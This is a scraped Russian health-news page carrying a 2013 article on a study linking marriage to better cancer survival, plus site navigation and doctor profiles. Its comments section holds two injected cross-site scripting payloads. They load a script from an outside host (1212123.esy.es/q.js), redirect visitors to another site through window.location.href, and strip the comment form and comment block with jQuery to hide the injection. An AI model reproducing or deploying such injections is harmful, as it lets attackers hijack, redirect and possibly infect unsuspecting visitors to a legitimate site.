Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Если хотите пережить рак ...  >>  Если хотите пережить рак – женитесь!
 
Обратная связь
 

Если хотите пережить рак – женитесь!

Размер шрифта
28 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Татьяна Дубровская
Здоровье инфо
  • google_analytics: false
  • Нравится

В браке рак пережить легче, чем в одиночестве!

Если хотите пережить рак – женитесь!

Такой вывод сделали ученые, исследовав более чем 730 000 больных раком в период между 2004 и 2008 годами.

Выяснилось, что смертность от рака была на 20% ниже у людей, состоящих в браке, чем у тех людей, которые овдовели или были разведены. Также в семейных парах рак обнаруживался на самых ранних стадиях гораздо чаще, чем у одиноких людей, поэтому они получали своевременное лечение гораздо раньше и эффективнее.

Даже в плане лечения химиотерапией лучшие результаты демонстрировали больные раком, находящиеся в браке.

Выживаемость больных в браке была выше у мужчин, чем у женщин. Женатые мужчины на 23% реже умирали от болезни, чем холостяки. А замужние женщины – на 16% реже, чем одинокие.

Так в чем же причина? Наверное, в том, что мужчины, даже врачи, не хотят обследоваться, когда болезнь пока не мешает жить.

Конечно, исследование не доказывает то, что брак является единственной причиной лучшей выживаемости от рака, или то, что некоторые люди способны победить рак, а другие – нет.

Тем не менее, другие исследования подтверждают, что в несчастных браках выживаемость не увеличивалась, и больные практически приравнивались к одиноким.

Просто для многих людей семейные узы помогают друг другу бороться за свое здоровье. Особенно это имеет значение в тех случаях, когда нужна сильная поддержка в тяжелые моменты лечения, например, во время химиотерапии.

Успех всех самых тяжелых процедур на разных этапах лечения во многом зависит от дисциплинированного посещения и соблюдения медицинских назначений. Поддержка близкого человека в этом плане способна творить чудеса.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:51

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:51

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Три повода сохранить брак   Мужчины и женщины воспринимают мир по-разному   Вы живете с неудачником? 6 причин, почему вы не можете уйти от него   Ваша скорость предскажет продолжительность жизни! 9 поводов погулять!  
27 июля 2011Половина мужчин бросили бы растолстевшую подругу 20 мая 2013Если вдруг стало грустно – позвоните маме! Оказывается самые чуткие и понимающие – это женщины в 50-60 лет!
 
17 мая 2013Пол вашего ребенка влияет на продолжительность жизни! Кого рожать, чтобы прожить дольше? 30 апреля 2013Нужны ли бабушке социальные сети? Оказывается, они улучшат ее умственные способности!
 

Слайдшоу

1
Мужчины. Как их понять?
Рак простаты. Болезнь, которая грозит каждому мужчине!
Почему от пожилых так пахнет

Тесты

1
Сколько вы проживете?
Что вы знаете о груди?
Яички – удивительный орган
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.